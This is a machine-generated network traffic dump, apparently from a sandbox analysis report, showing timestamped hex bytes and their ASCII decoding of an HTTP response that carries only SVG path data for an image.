                                                                                                                                                                                                                                                                          Data Ascii: -4" d="M833.56,197.63a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12860INData Raw: 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 31 36 2e 34 34 2c 33 30 37 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ></path><path class="cls-4" d="M816.44,307.58a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12876INData Raw: 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 35 2e 39 32 2c 32 32 36 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-.15-2.81"></path><path class="cls-4" d="M785.92,226.58a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12892INData Raw: 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22
                                                                                                                                                                                                                                                                          Data Ascii: 81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12908INData Raw: 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 38 34 2c 31 35 38 2e 34 37 41 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 35 34 31 2c 31 36 31 61 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 18,3.18"></path><path class="cls-7" d="M541.84,158.47A1.92,1.92,0,0,1,541,161a2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12924INData Raw: 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12940INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 34 36 2c 31 34 38 2e 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M596.46,148.9a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12956INData Raw: 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: 79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12972INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 31 2e 30 37 2c 31 33 39 2e 33 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M651.07,139.33a1.91,1.91,0,0,1-.86,2.48,2.8,2.8,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12988INData Raw: 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: 9,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13004INData Raw: 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 36 39 2c 31 32 39 2e 37 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,3.18"></path><path class="cls-7" d="M705.69,129.75a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13836INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.34,2.34,0,0,1,.17,3.17"></path><path class="cls-7" d="M740.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13852INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 33 31 2c 31 32 30 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M760.31,120.18a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13868INData Raw: 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: .12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13884INData Raw: 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 39 32 2c 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22
                                                                                                                                                                                                                                                                          Data Ascii: 3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M688.92,233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13900INData Raw: 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 33 32 39 2e 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.63,0,0,1,0,3.57"></path><path class="cls-9" d="M723.35,329.6a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13916INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 38 2c 34 32 35 2e 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: ="cls-9" d="M757.78,425.4a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13932INData Raw: 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32
